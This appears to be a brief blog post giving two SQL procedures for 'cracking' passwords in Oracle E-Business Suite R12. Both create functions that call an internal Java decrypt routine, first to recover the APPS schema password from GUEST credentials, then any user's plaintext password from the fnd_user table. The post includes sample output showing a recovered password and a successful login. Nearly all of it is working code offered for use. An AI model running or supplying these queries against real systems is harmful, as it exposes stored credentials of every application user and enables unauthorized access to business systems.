Oracle Application R12: Crack APPS Password
1. Using system user we can decrypt it.
Login to system/<>
SQL> create FUNCTION apps.decrypt_pin_func(in_chr_key IN VARCHAR2,in_chr_encrypted_pin IN VARCHAR2)
RETURN VARCHAR2
AS
LANGUAGE JAVA NAME 'oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String) return java.lang.String';
2 3 4 5
6 /
Function created.
SQL> select ENCRYPTED_FOUNDATION_PASSWORD from apps.fnd_user where USER_NAME='GUEST';
ENCRYPTED_FOUNDATION_PASSWORD
--------------------------------------------------------------------------------
ZGD1A5C200E447B1412025F259B59C2780CF216B49C10ECCDDB93D564878096D7932D180CCC71671
63659569739CF63E958E
SQL> SELECT apps.decrypt_pin_func('GUEST/APPLMGR12','ZGD1A5C200E447B1412025F259B59C2780CF216B49C10ECCDDB93D564878096D7932D180CCC7167163659569739CF63E958E') from dual;
APPS.DECRYPT_PIN_FUNC('GUEST/APPLMGR12','ZGD1A5C200E447B1412025F259B59C2780CF216
--------------------------------------------------------------------------------
WINT3R
SQL> conn apps/WINT3R
Connected.
2. Using package creation
SQL> show user
USER is "APPS"
SQL> CREATE OR REPLACE PACKAGE get_pwd AS
FUNCTION decrypt (KEY IN VARCHAR2, VALUE IN VARCHAR2)
RETURN VARCHAR2;
END get_pwd;
2 3 4 5 /
Package created.
SQL>
CREATE OR REPLACE PACKAGE BODY get_pwd
AS
FUNCTION decrypt (KEY IN VARCHAR2, VALUE IN VARCHAR2)
RETURN VARCHAR2
AS
LANGUAGE JAVA NAME 'oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String) return java.lang.String';
END get_pwd;
/
Package body created.
SELECT usr.user_name,
get_pwd.decrypt
((SELECT (SELECT get_pwd.decrypt
(fnd_web_sec.get_guest_username_pwd,
usertable.encrypted_foundation_password
)
FROM DUAL) AS apps_password
FROM fnd_user usertable
WHERE usertable.user_name =
(SELECT SUBSTR
(fnd_web_sec.get_guest_username_pwd,
1,
INSTR
(fnd_web_sec.get_guest_username_pwd,
'/'
)
- 1
)
FROM DUAL)),
usr.encrypted_user_password
) PASSWORD
FROM fnd_user usr
WHERE usr.user_name = upper('&USER_NAME');
Please feel free to give feedback.